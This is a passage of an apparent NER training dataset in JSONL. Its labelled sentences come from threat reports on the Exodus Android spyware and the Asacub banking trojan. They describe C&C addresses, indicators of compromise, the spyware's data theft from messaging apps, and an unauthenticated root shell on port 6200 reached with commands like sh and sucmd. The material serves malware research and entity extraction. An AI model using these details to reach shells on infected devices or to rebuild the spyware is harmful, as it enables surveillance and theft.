are written in Italian .", "spans": {"SYSTEM: Play Store": [[11, 21]]}, "info": {"id": "cyner_train_001201", "source": "cyner_train"}} {"text": "According to Google , whom we have contacted to alert about our discoveries , nearly 25 variants of this spyware were uploaded on Google Play Store .", "spans": {"ORGANIZATION: Google": [[13, 19]], "SYSTEM: Google Play Store": [[130, 147]]}, "info": {"id": "cyner_train_001202", "source": "cyner_train"}} {"text": "While Google did not share with us the total number of infected devices , they confirmed that one of these malicious apps collected over 350 installations through the Play Store , while other variants collected few dozens each , and that all infections were located in Italy .", "spans": {"SYSTEM: Play Store": [[167, 177]]}, "info": {"id": "cyner_train_001204", "source": "cyner_train"}} {"text": "We have directly observed multiple copies of Exodus with more than 50 installs and we can estimate the total number of infections to amount in the several hundreds , if not a thousand or more .", "spans": {"MALWARE: Exodus": [[45, 51]]}, "info": {"id": "cyner_train_001205", "source": "cyner_train"}} {"text": "Stage 1 : Exodus One The first stage installed by downloading the malicious apps uploaded on Google Play Store only acts as a dropper .", "spans": {"MALWARE: Exodus One": [[10, 20]], "SYSTEM: Google Play Store": [[93, 110]]}, "info": {"id": "cyner_train_001206", "source": "cyner_train"}} {"text": "Following are some examples of the decoys used by these droppers : The purpose of Exodus One seems to be to collect some basic identifying information about the device ( namely the IMEI code and the phone number ) and send it to the Command & Control server .", "spans": {"MALWARE: Exodus One": [[82, 92]]}, "info": {"id": "cyner_train_001207", "source": "cyner_train"}} {"text": "This is usually done in order to validate the target of a new infection .", "spans": {}, "info": {"id": "cyner_train_001208", "source": 
"cyner_train"}} {"text": "This is further corroborated by some older and unobfuscated samples from 2016 , whose primary classes are named CheckValidTarget .", "spans": {}, "info": {"id": "cyner_train_001209", "source": "cyner_train"}} {"text": "During our tests the spyware was upgraded to the second stage on our test device immediately after the first check-ins .", "spans": {}, "info": {"id": "cyner_train_001210", "source": "cyner_train"}} {"text": "This suggests that the operators of the Command & Control are not enforcing a validation of the targets .", "spans": {}, "info": {"id": "cyner_train_001211", "source": "cyner_train"}} {"text": "Additionally , during a period of several days , our infected test device was never remotely disinfected by the operators .", "spans": {}, "info": {"id": "cyner_train_001212", "source": "cyner_train"}} {"text": "For the purpose of this report we analyze here the Exodus One sample with hash 8453ce501fee1ca8a321f16b09969c517f92a24b058ac5b54549eabd58bf1884 which communicated with the Command & Control server at 54.71.249.137 .", "spans": {"MALWARE: Exodus One": [[51, 61]]}, "info": {"id": "cyner_train_001213", "source": "cyner_train"}} {"text": "Other samples communicated with other servers listed at the bottom of this report .", "spans": {}, "info": {"id": "cyner_train_001214", "source": "cyner_train"}} {"text": "Exodus One checks-in by sending a POST request containing the app package name , the device IMEI and an encrypted body containing additional device information .", "spans": {}, "info": {"id": "cyner_train_001215", "source": "cyner_train"}} {"text": "The encrypted body is composed of various identifiers which are joined together : doFinal ( ) is called to encrypt the device information string : The user agent string is built from the package name and IMEI number : Finally the HTTP request is sent to the server at https : //54.71.249.137/eddd0317-2bdc-4140-86cb-0e8d7047b874 .", "spans": {}, "info": {"id": 
"cyner_train_001216", "source": "cyner_train"}} {"text": "Many of the strings in the application are XOR 'd with the key Kjk1MmphFG : After some additional requests , the dropper made a POST request to https : //54.71.249.137/56e087c9-fc56-49bb-bbd0-4fafc4acd6e1 which returned a zip file containing the second stage binaries .", "spans": {}, "info": {"id": "cyner_train_001217", "source": "cyner_train"}} {"text": "At least in most recent versions , as of January 2019 , the Zip archive would actually contain the i686 , arm and arm64 versions of all deployed binaries .", "spans": {}, "info": {"id": "cyner_train_001219", "source": "cyner_train"}} {"text": "File Name Modified Date SHA256 null_arm 2018-02-27 06:44:00 48a7dd672931e408662d2b5e1abcd6ef00097b8ffe3814f0d2799dd6fd74bd88 null_i686 2018-02-27 06:44:00 c228a534535b22a316a97908595a2d793d0fecabadc32846c6d1bfb08ca9a658 null_arm64 2018-02-27 06:43:00 48a7dd672931e408662d2b5e1abcd6ef00097b8ffe3814f0d2799dd6fd74bd88", "spans": {}, "info": {"id": "cyner_train_001220", "source": "cyner_train"}} {"text": "sepolicy-inject_arm 2019-01-08 04:55:00 47449a612697ad99a6fbd6e02a84e957557371151f2b034a411ebb10496648c8 sepolicy-inject_arm64 2019-01-08 04:55:00 824ad333320cbb7873dc49e61c14f749b0e0d88723635524463f2e6f56ea133a sepolicy-inject_i686 2019-01-08 04:55:00 13ec6cec511297ac3137cf7d6e4a7c4f5dd2b24478a06262a44f13a3d61070b6", "spans": {}, "info": {"id": "cyner_train_001221", "source": "cyner_train"}} {"text": "rootdaemon_arm 2019-01-08 04:55:00 00c787c0c0bc26caf623e66373a5aaa1b913b9caee1f34580bdfdd21954b7cc4 rootdaemon_arm64 2019-01-08 04:55:00 3ee3a973c62ba5bd9eab595a7c94b7a26827c5fa5b21964d511ab58903929ec5 mike.jar 2018-12-06 05:50:00 a42a05bf9b412cd84ea92b166d790e8e72f1d01764f93b05ace62237fbabe40e", "spans": {}, "info": {"id": "cyner_train_001222", "source": "cyner_train"}} {"text": "rootdaemon_i686 2019-01-08 04:55:00 b46f282f9a1bce3798faee3212e28924730a657eb93cda3824c449868b6ee2e7 zygotedaemonarm 2019-01-08 04:55:00 
e3f65f84dd6c2c3a5a653a3788d78920c0321526062a6b53daaf23fa57778a5f zygotedaemonarm64 2019-01-08 04:55:00 11499ff2418f4523344de81a447f6786fdba4982057d4114f64db929990b4b59", "spans": {}, "info": {"id": "cyner_train_001223", "source": "cyner_train"}} {"text": "zygotedaemoni686 2019-01-08 04:55:00 3c9f08b3280851f54414dfa5a57f40d3b7be7b73736fa0ba21b078e75ce54d33 sapp.apk 2019-01-08 04:53:00 4bf1446c412dd5c552539490d03e999a6ceb96ae60a9e7846427612bec316619 placeholder 2018-03-29 16:31:00 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "spans": {}, "info": {"id": "cyner_train_001224", "source": "cyner_train"}} {"text": "After download , Exodus One would dynamically load and execute the primary stage 2 payload mike.jar using the Android API DexClassLoader ( ) .", "spans": {"MALWARE: Exodus One": [[17, 27]], "SYSTEM: Android API": [[110, 121]]}, "info": {"id": "cyner_train_001225", "source": "cyner_train"}} {"text": "Similarly to another Android spyware made in Italy , originally discovered by Lukas Stefanko and later named Skygofree and analyzed in depth by Kaspersky Labs , Exodus also takes advantage of \" protectedapps '' , a feature in Huawei phones that allows to configure power-saving options for running applications .", "spans": {"SYSTEM: Android": [[21, 28]], "MALWARE: Skygofree": [[109, 118]], "ORGANIZATION: Kaspersky Labs": [[144, 158]], "MALWARE: Exodus": [[161, 167]], "ORGANIZATION: Huawei": [[226, 232]]}, "info": {"id": "cyner_train_001229", "source": "cyner_train"}} {"text": "Additionally , rootdaemon attempts to remove its own power usage statistics from Huawei phones ' SystemManager : Similarly , the malicious application probably attempts to minimize traces on Samsung phones by adding to the file /data/data/com.samsung.android.securitylogagent/shared_prefs/apm_sp_status_of_apps.xml the following lines : And adding to the file /data/data/com.samsung.android.securitylogagent/shared_prefs/com.samsung.android.securitylogagent_preferences.xml", 
"spans": {"ORGANIZATION: Huawei": [[81, 87]], "ORGANIZATION: Samsung": [[191, 198]]}, "info": {"id": "cyner_train_001231", "source": "cyner_train"}} {"text": "these lines instead : Data Collection and Exfiltration As mentioned , mike.jar equips the spyware with extensive collection capabilities , including : Retrieve a list of installed applications .", "spans": {}, "info": {"id": "cyner_train_001232", "source": "cyner_train"}} {"text": "Record surroundings using the built-in microphone in 3gp format .", "spans": {}, "info": {"id": "cyner_train_001233", "source": "cyner_train"}} {"text": "Retrieve the browsing history and bookmarks from Chrome and SBrowser ( the browser shipped with Samsung phones ) .", "spans": {"SYSTEM: Chrome": [[49, 55]], "SYSTEM: SBrowser": [[60, 68]], "ORGANIZATION: Samsung": [[96, 103]]}, "info": {"id": "cyner_train_001234", "source": "cyner_train"}} {"text": "Extract the calls log .", "spans": {}, "info": {"id": "cyner_train_001236", "source": "cyner_train"}} {"text": "Extract the address book .", "spans": {"SYSTEM: address book": [[12, 24]]}, "info": {"id": "cyner_train_001240", "source": "cyner_train"}} {"text": "Extract the contacts list from the Facebook app .", "spans": {"SYSTEM: Facebook app": [[35, 47]]}, "info": {"id": "cyner_train_001241", "source": "cyner_train"}} {"text": "Take a screenshot of any app in foreground .", "spans": {}, "info": {"id": "cyner_train_001243", "source": "cyner_train"}} {"text": "Extract information from th GMail app .", "spans": {"SYSTEM: GMail": [[28, 33]]}, "info": {"id": "cyner_train_001245", "source": "cyner_train"}} {"text": "Dump data from the IMO messenger app .", "spans": {"SYSTEM: messenger": [[23, 32]]}, "info": {"id": "cyner_train_001246", "source": "cyner_train"}} {"text": "Extract call logs , contacts and messages from the Skype app .", "spans": {"SYSTEM: Skype": [[51, 56]]}, "info": {"id": "cyner_train_001247", "source": "cyner_train"}} {"text": "Extract messages and the encryption key from 
the Telegram app .", "spans": {"SYSTEM: Telegram": [[49, 57]]}, "info": {"id": "cyner_train_001249", "source": "cyner_train"}} {"text": "Dump data from the Viber messenger app .", "spans": {"SYSTEM: Viber messenger": [[19, 34]]}, "info": {"id": "cyner_train_001250", "source": "cyner_train"}} {"text": "Extract logs from WhatsApp .", "spans": {"SYSTEM: WhatsApp": [[18, 26]]}, "info": {"id": "cyner_train_001251", "source": "cyner_train"}} {"text": "Retrieve media exchanged through WhatsApp .", "spans": {"SYSTEM: WhatsApp": [[33, 41]]}, "info": {"id": "cyner_train_001252", "source": "cyner_train"}} {"text": "Extract the Wi-Fi network 's password .", "spans": {}, "info": {"id": "cyner_train_001253", "source": "cyner_train"}} {"text": "Extract data from WeChat app .", "spans": {"SYSTEM: WeChat": [[18, 24]]}, "info": {"id": "cyner_train_001254", "source": "cyner_train"}} {"text": "Extract current GPS coordinates of the phone .", "spans": {}, "info": {"id": "cyner_train_001255", "source": "cyner_train"}} {"text": "While some of these acquisition are performed purely through code in mike.jar , some others that require access to , for example , SQLite databases or other files in the application 's storage are performed through rootdaemon instead , which should be running with root privileges .", "spans": {}, "info": {"id": "cyner_train_001256", "source": "cyner_train"}} {"text": "Ports 6203 and 6204 : Facebook extraction service .", "spans": {"ORGANIZATION: Facebook": [[22, 30]]}, "info": {"id": "cyner_train_001258", "source": "cyner_train"}} {"text": "Port 6205 : Gmail extraction service .", "spans": {"SYSTEM: Gmail": [[12, 17]]}, "info": {"id": "cyner_train_001259", "source": "cyner_train"}} {"text": "Port 6207 : Viber extraction service .", "spans": {"SYSTEM: Viber": [[12, 17]]}, "info": {"id": "cyner_train_001261", "source": "cyner_train"}} {"text": "Port 6209 : Telegram extraction service .", "spans": {"SYSTEM: Telegram": [[12, 20]]}, "info": {"id": 
"cyner_train_001263", "source": "cyner_train"}} {"text": "Port 6210 : SBrowser extraction service .", "spans": {"SYSTEM: SBrowser": [[12, 20]]}, "info": {"id": "cyner_train_001264", "source": "cyner_train"}} {"text": "Port 6212 : Chrome extraction service .", "spans": {"SYSTEM: Chrome": [[12, 18]]}, "info": {"id": "cyner_train_001266", "source": "cyner_train"}} {"text": "These services appear to be running on all network interfaces and are therefore accessible to anyone sharing a local network with an infected device .", "spans": {}, "info": {"id": "cyner_train_001267", "source": "cyner_train"}} {"text": "Following we can see an example of a connection to port 6209 which is used to extract data from the Telegram app .", "spans": {"SYSTEM: Telegram": [[100, 108]]}, "info": {"id": "cyner_train_001268", "source": "cyner_train"}} {"text": "We are able to send commands to the service such as dumpmsgdb or getkey ( which dumps the tgnet.dat file ) .", "spans": {}, "info": {"id": "cyner_train_001269", "source": "cyner_train"}} {"text": "Data is eventually exfiltrated over a TLS connection to the Command & Control server ws.my-local-weather [ .", "spans": {}, "info": {"id": "cyner_train_001271", "source": "cyner_train"}} {"text": "As mentioned before , our test device was automatically from stage one to stage two , which started collecting data .", "spans": {}, "info": {"id": "cyner_train_001273", "source": "cyner_train"}} {"text": "For example , the password of the WiFi network used by the phone was stored in the folder /storage/emulated/0/.lost+found/0BBDA068-9D27-4B55-B226-299FCF2B4242/ using the following file name format DD_MM_2019_HH_mm_ss_XXXXXXXXXXXXX.txt.crypt ( the datetime followed by the IMEI ) .", "spans": {}, "info": {"id": "cyner_train_001274", "source": "cyner_train"}} {"text": "This payload will then attempt to instantiate a remote reverse /system/bin/sh shell to the Command & Control ws.my-local-weather [ .", "spans": {}, "info": {"id": 
"cyner_train_001278", "source": "cyner_train"}} {"text": "It is worth noticing that this remote reverse shell does not employ any transport cryptography .", "spans": {}, "info": {"id": "cyner_train_001280", "source": "cyner_train"}} {"text": "This local port is used by Exodus Two to execute various commands on the Android device , such as enabling or disabling certain services , or parsing app databases .", "spans": {"MALWARE: Exodus Two": [[27, 37]], "SYSTEM: Android": [[73, 80]]}, "info": {"id": "cyner_train_001282", "source": "cyner_train"}} {"text": "For example , if an infected device is connected to a public Wi-Fi network any other host will be able to obtain a terminal on the device without any form of authentication or verification by simply connecting to the port .", "spans": {}, "info": {"id": "cyner_train_001284", "source": "cyner_train"}} {"text": "If the mobile operator does n't enforce proper client isolation , it is possible that the infected devices are also exposed to the rest of the cellular network .", "spans": {}, "info": {"id": "cyner_train_001285", "source": "cyner_train"}} {"text": "Obviously , this inevitably leaves the device open not only to further compromise but to data tampering as well .", "spans": {}, "info": {"id": "cyner_train_001286", "source": "cyner_train"}} {"text": "null is not the only payload opening a shell on the phone .", "spans": {}, "info": {"id": "cyner_train_001287", "source": "cyner_train"}} {"text": "Sending the command sh to TCP port 6200 results in a full terminal being dropped : Sending the command cmd followed by a proper terminal command will execute it and print the output ( in the example we use id which displays the identity of the system user running the issued commands ) : Doing the same as above but with command sucmd will run the terminal command as root : Other commands supported by rootdaemon on TCP port 6200 are su ( which in our tests did n't properly work ) , loadsocketpolicy , loadfilepolicy , 
remount and removeroot", "spans": {}, "info": {"id": "cyner_train_001289", "source": "cyner_train"}} {"text": "However , the persistent presence of Italian language both on the Google Play Store pages as well as inside the spyware code was a clear sign that an Italian actor was behind the creation of this platform .", "spans": {"SYSTEM: Google Play": [[66, 77]]}, "info": {"id": "cyner_train_001292", "source": "cyner_train"}} {"text": "\" Mundizza '' is a dialectal word , a derivative of the proper Italian word \" immondizia '' that translates to \" trash '' or \" garbage '' in English .", "spans": {}, "info": {"id": "cyner_train_001294", "source": "cyner_train"}} {"text": "Interestingly , \" mundizza '' is typical of Calabria , a region in the south of Italy , and more specifically it appears to be language native of the city of Catanzaro .", "spans": {}, "info": {"id": "cyner_train_001295", "source": "cyner_train"}} {"text": "While not too seriously , these elements made us restrict our research into surveillance companies from the region .", "spans": {}, "info": {"id": "cyner_train_001297", "source": "cyner_train"}} {"text": "Overlapping Infrastructure with eSurv Surveillance Cameras The Command & Control domain configured in several of the malicious applications found on Google Play Store , ws.my-local-weather [ .", "spans": {"SYSTEM: Google Play Store": [[149, 166]]}, "info": {"id": "cyner_train_001298", "source": "cyner_train"}} {"text": "] com , points to the IP address 54.69.156.31 which serves a self-signed TLS certificate with the certificate common name MyCert and fingerprint 11:41:45:2F : A7:07:23:54 : AE:9A : CE : F4 : FE:56 : AE : AC : B1 : C2:15:9F:6A : FC:1E : CC:7D : F8:61 : E3:25:26:73:6A .", "spans": {}, "info": {"id": "cyner_train_001299", "source": "cyner_train"}} {"text": "A search for this certificate fingerprint on the Internet scanning service Censys returns 8 additional servers : IP address 34.208.71.9 34.212.92.0 34.216.43.114 
52.34.144.229 54.69.156.31 54.71.249.137 54.189.5.198 78.5.0.195 207.180.245.74 Opening the Command & Control web page in a browser presents a Basic Authentication prompt : Closing this prompt causes the server to send a \" 401 Unauthorized Response '' with an \" Access Denied '' message in Italian", "spans": {}, "info": {"id": "cyner_train_001300", "source": "cyner_train"}} {"text": "All of the other IP address we discovered sharing the same TLS certificate behave in the same way .", "spans": {}, "info": {"id": "cyner_train_001302", "source": "cyner_train"}} {"text": "The Command & Control server also displays a favicon image which looks like a small orange ball .", "spans": {}, "info": {"id": "cyner_train_001303", "source": "cyner_train"}} {"text": "Many of these servers are control panels for video surveillance systems developed by the Italian company eSurv , based in Catanzaro , in Calabria , Italy .", "spans": {}, "info": {"id": "cyner_train_001305", "source": "cyner_train"}} {"text": "eSurv 's logo is identical to the Command & Control server favicon .", "spans": {"ORGANIZATION: eSurv": [[0, 5]]}, "info": {"id": "cyner_train_001307", "source": "cyner_train"}} {"text": "Older samples connecting to eSurv Finally , Google shared with us some older samples of Exodus One ( with hashes 2055584625d24687bd027a63bc0b8faa7d1a854a535de74afba24840a52b1d2f and a37f5d2418c5f2f64d06ba28fe62edee1293a56158ddfa9f04020e316054363f ) which are not obfuscated and use the following disguise : The configuration of these older samples", "spans": {"ORGANIZATION: eSurv": [[28, 33]], "ORGANIZATION: Google": [[44, 50]], "MALWARE: Exodus One": [[88, 98]]}, "info": {"id": "cyner_train_001308", "source": "cyner_train"}} {"text": "is very similar to newer ones , but it provides additional insights being not obfuscated : Firstly we can notice that , instead of generic domain names or IP addresses , these samples communicated with a Command & Control server located at attiva.exodus.esurv [ .", 
"spans": {}, "info": {"id": "cyner_train_001309", "source": "cyner_train"}} {"text": "] it ( \" attiva '' is the Italian for \" activate '' ) .", "spans": {}, "info": {"id": "cyner_train_001310", "source": "cyner_train"}} {"text": "( We named the spyware \" Exodus '' after this Command & Control domain name .", "spans": {}, "info": {"id": "cyner_train_001311", "source": "cyner_train"}} {"text": ") Following is the snippet of code in these older Exodus One samples showing the connection to the Command & Control : Below is the almost identical composition of the request to the Command & Control server in mike.jar ( also containing the path 7e661733-e332-429a-a7e2-23649f27690f ) : To further corroborate the connection of the Exodus spyware with eSurv , the domain attiva.exodus.esurv.it resolves to the IP 212.47.242.236 which , according to", "spans": {"MALWARE: Exodus One": [[50, 60]], "MALWARE: Exodus spyware": [[333, 347]]}, "info": {"id": "cyner_train_001312", "source": "cyner_train"}} {"text": "public passive DNS data , in 2017 was used to host the domain server1cs.exodus.connexxa.it .", "spans": {}, "info": {"id": "cyner_train_001313", "source": "cyner_train"}} {"text": "Connexxa was a company also from Catanzaro .", "spans": {}, "info": {"id": "cyner_train_001314", "source": "cyner_train"}} {"text": "According to publicly available information , the founder of Connexxa seems to also be the CEO of eSurv .", "spans": {"ORGANIZATION: Connexxa": [[61, 69]], "ORGANIZATION: eSurv": [[98, 103]]}, "info": {"id": "cyner_train_001315", "source": "cyner_train"}} {"text": "Interestingly , we found other DNS records mostly from 2017 that follow a similar pattern and appear to contain two-letters codes for districts in Italy : Server City server1bo.exodus.connexxa [ .", "spans": {}, "info": {"id": "cyner_train_001316", "source": "cyner_train"}} {"text": "] it Bologna server1bs.exodus.connexxa [ .", "spans": {}, "info": {"id": "cyner_train_001317", "source": "cyner_train"}} 
{"text": "] it Brescia server1cs.exodus.connexxa [ .", "spans": {}, "info": {"id": "cyner_train_001318", "source": "cyner_train"}} {"text": "] it Cosenza server1ct.exodus.connexxa [ .", "spans": {}, "info": {"id": "cyner_train_001319", "source": "cyner_train"}} {"text": "] it Catania server1fermo.exodus.connexxa [ .", "spans": {}, "info": {"id": "cyner_train_001320", "source": "cyner_train"}} {"text": "] it server1fi.exodus.connexxa [ .", "spans": {}, "info": {"id": "cyner_train_001321", "source": "cyner_train"}} {"text": "] it Firenze server1gioiat.exodus.connexxa [ .", "spans": {}, "info": {"id": "cyner_train_001322", "source": "cyner_train"}} {"text": "] it Napoli server1rc.exodus.connexxa [ .", "spans": {}, "info": {"id": "cyner_train_001324", "source": "cyner_train"}} {"text": "] it Reggio Calabria server2ct.exodus.connexxa [ .", "spans": {}, "info": {"id": "cyner_train_001325", "source": "cyner_train"}} {"text": "] it Catania server2cz.exodus.connexxa [ .", "spans": {}, "info": {"id": "cyner_train_001326", "source": "cyner_train"}} {"text": "] it Catanzaro server2fi.exodus.connexxa [ .", "spans": {}, "info": {"id": "cyner_train_001327", "source": "cyner_train"}} {"text": "] it Milano server2rc.exodus.connexxa [ .", "spans": {}, "info": {"id": "cyner_train_001329", "source": "cyner_train"}} {"text": "] it Reggio Calabria server3bo.exodus.connexxa [ .", "spans": {}, "info": {"id": "cyner_train_001330", "source": "cyner_train"}} {"text": "] it Catania server3.exodus.connexxa [ .", "spans": {}, "info": {"id": "cyner_train_001332", "source": "cyner_train"}} {"text": "] it Firenze server4fi.exodus.connexxa [ .", "spans": {}, "info": {"id": "cyner_train_001334", "source": "cyner_train"}} {"text": "] it Firenze serverrt.exodus.connexxa [ .", "spans": {}, "info": {"id": "cyner_train_001335", "source": "cyner_train"}} {"text": "Further details in it reflect characteristics of Exodus ( such as the bypass of power managers we described from Exodus One , and more ) : 
Indicators of Compromise Exodus One 011b6bcebd543d4eb227e840f04e188fb01f2335b0b81684b60e6b45388d3820 0f5f1409b1ebbee4aa837d20479732e11399d37f05b47b5359dc53a4001314e5 2055584625d24687bd027a63bc0b8faa7d1a854a535de74afba24840a52b1d2f", "spans": {"MALWARE: Exodus": [[49, 55]], "MALWARE: Exodus One": [[113, 123], [164, 174]]}, "info": {"id": "cyner_train_001337", "source": "cyner_train"}} {"text": "26fef238028ee4b5b8da631c77bfb44ada3d5db8129c45dea5df6a51c9ea5f55 33a9da16d096426c82f150e39fc4f9172677885cfeaedcff10c86414e88be802 34d000ee1e36efd10eb37e2b79d69249d5a85682a61390a89a1b9391c46bf2ba 4f6146956b50ae3a6e80a1c1f771dba848ba677064eb0e166df5804ac2766898", "spans": {}, "info": {"id": "cyner_train_001338", "source": "cyner_train"}} {"text": "5db49122d866967295874ab2c1ce23a7cde50212ff044bbea1da9b49bb9bc149 70e2eea5609c6954c61f2e5e0a3aea832d0643df93d18d7d78b6f9444dcceef0 80810a8ec9624f317f832ac2e212dba033212258285344661e5da11b0d9f0b62 8453ce501fee1ca8a321f16b09969c517f92a24b058ac5b54549eabd58bf1884", "spans": {}, "info": {"id": "cyner_train_001339", "source": "cyner_train"}} {"text": "a37f5d2418c5f2f64d06ba28fe62edee1293a56158ddfa9f04020e316054363f db59407f72666526fca23d31e3b4c5df86f25eff178e17221219216c6975c63f e0acbb0d7e55fb67e550a6bf5cf5c499a9960eaf5f037b785f9004585202593b Exodus One Package Names com.phonecarrier.linecheck", "spans": {"MALWARE: Exodus One": [[195, 205]]}, "info": {"id": "cyner_train_001340", "source": "cyner_train"}} {"text": "rm.rf operatore.italia it.offertetelefonicheperte it.servizipremium assistenza.sim assistenza.linea.riattiva assistenza.linea it.promofferte Exodus Two 64c11fdb317d6b7c9930e639f55863df592f23f3c7c861ddd97048891a90c64b a42a05bf9b412cd84ea92b166d790e8e72f1d01764f93b05ace62237fbabe40e Exodus Two", "spans": {"MALWARE: Exodus Two": [[141, 151], [282, 292]]}, "info": {"id": "cyner_train_001341", "source": "cyner_train"}} {"text": "ELF Utilities 00c787c0c0bc26caf623e66373a5aaa1b913b9caee1f34580bdfdd21954b7cc4 
11499ff2418f4523344de81a447f6786fdba4982057d4114f64db929990b4b59 13ec6cec511297ac3137cf7d6e4a7c4f5dd2b24478a06262a44f13a3d61070b6 3c9f08b3280851f54414dfa5a57f40d3b7be7b73736fa0ba21b078e75ce54d33", "spans": {}, "info": {"id": "cyner_train_001342", "source": "cyner_train"}} {"text": "3ee3a973c62ba5bd9eab595a7c94b7a26827c5fa5b21964d511ab58903929ec5 47449a612697ad99a6fbd6e02a84e957557371151f2b034a411ebb10496648c8 48a7dd672931e408662d2b5e1abcd6ef00097b8ffe3814f0d2799dd6fd74bd88 824ad333320cbb7873dc49e61c14f749b0e0d88723635524463f2e6f56ea133a", "spans": {}, "info": {"id": "cyner_train_001343", "source": "cyner_train"}} {"text": "b46f282f9a1bce3798faee3212e28924730a657eb93cda3824c449868b6ee2e7 c228a534535b22a316a97908595a2d793d0fecabadc32846c6d1bfb08ca9a658 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 e3f65f84dd6c2c3a5a653a3788d78920c0321526062a6b53daaf23fa57778a5f", "spans": {}, "info": {"id": "cyner_train_001344", "source": "cyner_train"}} {"text": "Command & Controls ad1.fbsba [ .", "spans": {}, "info": {"id": "cyner_train_001345", "source": "cyner_train"}} {"text": "] com ws.my-local-weather [ .", "spans": {}, "info": {"id": "cyner_train_001346", "source": "cyner_train"}} {"text": "] 31 162.243.172 [ .", "spans": {}, "info": {"id": "cyner_train_001349", "source": "cyner_train"}} {"text": "] 208 attiva.exodus.esurv [ .", "spans": {}, "info": {"id": "cyner_train_001350", "source": "cyner_train"}} {"text": "] it The rise of mobile banker Asacub 28 AUG 2018 We encountered the Trojan-Banker.AndroidOS.Asacub family for the first time in 2015 , when the first versions of the malware were detected , analyzed , and found to be more adept at spying than stealing funds .", "spans": {"MALWARE: Asacub": [[31, 37]], "MALWARE: Trojan-Banker.AndroidOS.Asacub": [[69, 99]]}, "info": {"id": "cyner_train_001351", "source": "cyner_train"}} {"text": "The Trojan has evolved since then , aided by a large-scale distribution campaign by its creators ( in spring-summer 2017 
) , helping Asacub to claim top spots in last year ’ s ranking by number of attacks among mobile banking Trojans , outperforming other families such as Svpeng and Faketoken .", "spans": {"MALWARE: Asacub": [[133, 139]], "MALWARE: Svpeng": [[273, 279]], "MALWARE: Faketoken": [[284, 293]]}, "info": {"id": "cyner_train_001352", "source": "cyner_train"}} {"text": "Our eyes fell on the latest version of the Trojan , which is designed to steal money from owners of Android devices connected to the mobile banking service of one of Russia ’ s largest banks .", "spans": {"SYSTEM: Android": [[100, 107]]}, "info": {"id": "cyner_train_001354", "source": "cyner_train"}} {"text": "The numbering seems to have started anew after the version 9 .", "spans": {}, "info": {"id": "cyner_train_001356", "source": "cyner_train"}} {"text": "Versions 5.X.X-8.X.X were active in 2016 , and versions 9.X.X-1.X.X in 2017 .", "spans": {}, "info": {"id": "cyner_train_001358", "source": "cyner_train"}} {"text": "In 2018 , the most actively distributed versions were 5.0.0 and 5.0.3 .", "spans": {}, "info": {"id": "cyner_train_001359", "source": "cyner_train"}} {"text": "Communication with C & C Although Asacub ’ s capabilities gradually evolved , its network behavior and method of communication with the command-and-control ( C & C ) server changed little .", "spans": {"MALWARE: Asacub": [[34, 40]]}, "info": {"id": "cyner_train_001360", "source": "cyner_train"}} {"text": "This strongly suggested that the banking Trojans , despite differing in terms of capability , belong to the same family .", "spans": {}, "info": {"id": "cyner_train_001361", "source": "cyner_train"}} {"text": "Data was always sent to the C & C server via HTTP in the body of a POST request in encrypted form to the relative address /something/index.php .", "spans": {}, "info": {"id": "cyner_train_001362", "source": "cyner_train"}} {"text": "In earlier versions , the something part of the relative path was a partially intelligible , yet 
random mix of words and short combinations of letters and numbers separated by an underscore , for example , “ bee_bomb ” or “ my_te2_mms ” .", "spans": {}, "info": {"id": "cyner_train_001363", "source": "cyner_train"}} {"text": "Example of traffic from an early version of Asacub ( 2015 ) The data transmitted and received is encrypted with the RC4 algorithm and encoded using the base64 standard .", "spans": {"MALWARE: Asacub": [[44, 50]]}, "info": {"id": "cyner_train_001364", "source": "cyner_train"}} {"text": "The C & C address and the encryption key ( one for different modifications in versions 4.x and 5.x , and distinct for different C & Cs in later versions ) are stitched into the body of the Trojan .", "spans": {}, "info": {"id": "cyner_train_001365", "source": "cyner_train"}} {"text": "In early versions of Asacub , .com , .biz , .info , .in , .pw were used as top-level domains .", "spans": {"MALWARE: Asacub": [[21, 27]]}, "info": {"id": "cyner_train_001366", "source": "cyner_train"}} {"text": "In the 2016 version , the value of the User-Agent header changed , as did the method of generating the relative path in the URL : now the part before /index.php is a mix of a pronounceable ( if not entirely meaningful ) word and random letters and numbers , for example , “ muromec280j9tqeyjy5sm1qy71 ” or “ parabbelumf8jgybdd6w0qa0 ” .", "spans": {}, "info": {"id": "cyner_train_001367", "source": "cyner_train"}} {"text": "Moreover , incoming traffic from the C & C server began to use gzip compression , and the top-level domain for all C & Cs was .com : Since December 2016 , the changes in C & C communication methods have affected only how the relative path in the URL is generated : the pronounceable word was replaced by a rather long random combination of letters and numbers , for example , “ ozvi4malen7dwdh ” or “ f29u8oi77024clufhw1u5ws62 ” .", "spans": {}, "info": {"id": "cyner_train_001368", "source": "cyner_train"}} {"text": "At the time of writing this article , no 
other significant changes in Asacub ’ s network behavior had been observed : The origin of Asacub It is fairly safe to say that the Asacub family evolved from Trojan-SMS.AndroidOS.Smaps .", "spans": {"MALWARE: Asacub": [[70, 76], [132, 138], [173, 179]]}, "info": {"id": "cyner_train_001369", "source": "cyner_train"}} {"text": "Communication between both Trojans and their C & C servers is based on the same principle , the relative addresses to which Trojans send network requests are generated in a similar manner , and the set of possible commands that the two Trojans can perform also overlaps .", "spans": {}, "info": {"id": "cyner_train_001370", "source": "cyner_train"}} {"text": "The main difference is that Smaps transmits data as plain text , while Asacub encrypts data with the RC4 algorithm and then encodes it into base64 format .", "spans": {"MALWARE: Smaps": [[28, 33]], "MALWARE: Asacub": [[71, 77]]}, "info": {"id": "cyner_train_001372", "source": "cyner_train"}} {"text": "Let ’ s compare examples of traffic from Smaps and Asacub — an initializing request to the C & C server with information about the infected device and a response from the server with a command for execution : Smaps request Asacub request Decrypted data from Asacub traffic : { “ id ” : ” 532bf15a-b784-47e5-92fa-72198a2929f5″ , ” type ” : ” get ” , ” info ” : ” imei:365548770159066 , country : PL , cell : Tele2", "spans": {"MALWARE: Smaps": [[41, 46], [209, 214]], "MALWARE: Asacub": [[51, 57], [223, 229], [258, 264]]}, "info": {"id": "cyner_train_001373", "source": "cyner_train"}} {"text": ", android:4.2.2 , model : GT-N5100 , phonenumber : +486679225120 , sim:6337076348906359089f , app : null , ver:5.0.2″ } Data sent to the server [ { “ command ” : ” sent & & & ” , ” params ” : { “ to ” : ” +79262000900″ , ” body ” : ” \\u0410\\u0412\\u0422\\u041e\\u041f\\u041b\\u0410\\u0422\\u0415\\u0416", "spans": {}, "info": {"id": "cyner_train_001374", "source": "cyner_train"}} {"text": "1000 50″ , ” 
